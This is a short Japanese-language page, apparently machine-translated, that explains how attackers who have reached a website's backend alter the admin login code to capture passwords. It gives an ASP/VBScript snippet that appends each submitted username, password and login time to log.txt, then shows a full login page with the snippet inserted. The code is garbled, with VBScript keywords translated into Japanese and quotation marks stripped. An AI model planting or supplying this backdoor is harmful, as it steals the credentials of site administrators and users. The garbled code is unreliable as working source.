多くのハッカーは、バックグラウンドのログイン コードを変更することでターゲット Web サイトのユーザー ログイン パスワードを取得し、パスワードを入力するとそのパスワードが txt に保存されます。
コードは次のとおりです。
set fso=server.createobject(scripting.filesystemobject)
fso.FileExists(server.mappath(log.txt))=true の場合
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
フィン=何も設定しない
終了する場合
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)
fout.close
fout=何も設定しない
fso=何も設定しない
バックグラウンドログイン時にフォームが送信される場所に挿入してください。
参考文献:
次のようにコードをコピーします。
<%@ language=vbscript コードページ=936 %>
<%
ディムSQL、RS
dim ユーザー名、パスワード、チェックコード
ユーザー名=replace(trim(リクエスト(ユーザー名)),',)
パスワード=replace(trim(リクエスト(パスワード)),',)
CheckCode=replace(trim(Request(CheckCode)),',)
ユーザー名 = の場合
見つかったエラー=真
ErrMsg=ErrMsg & <br><li>ユーザー名を空にすることはできません。 </li>
終了する場合
if パスワード = then
見つかったエラー=真
ErrMsg=ErrMsg & <br><li>パスワードを空にすることはできません。 </li>
終了する場合
if CheckCode= then
見つかったエラー=真
ErrMsg=ErrMsg & <br><li>確認コードを空にすることはできません。 </li>
終了する場合
if session(CheckCode)= then
見つかったエラー=真
ErrMsg=ErrMsg & <br><li>ログイン時間が長すぎます。ログイン ページに戻って再度ログインしてください。 </li>
終了する場合
if CheckCode<>CStr(session(CheckCode)) then
見つかったエラー=真
ErrMsg=ErrMsg & <br><li>入力した確認コードは、システムによって生成されたものと一致しません。再入力してください。 </li>
終了する場合
'この後ろに追加したコードです ~ 開始領域
set fso=server.createobject(scripting.filesystemobject)
fso.FileExists(server.mappath(log.txt))=true の場合
set fin=fso.OpenTextFile(server.mappath(log.txt))
temp=fin.readall
fin.close
フィン=何も設定しない
終了する場合
set fout=fso.createtextfile(server.mappath(log.txt))
fout.WriteLine(temp&user:&username&|pwd:&password&|time:&now()&)
fout.close
fout=何も設定しない
fso=何も設定しない
'コードビハインドはme~end領域によって削除されました
%>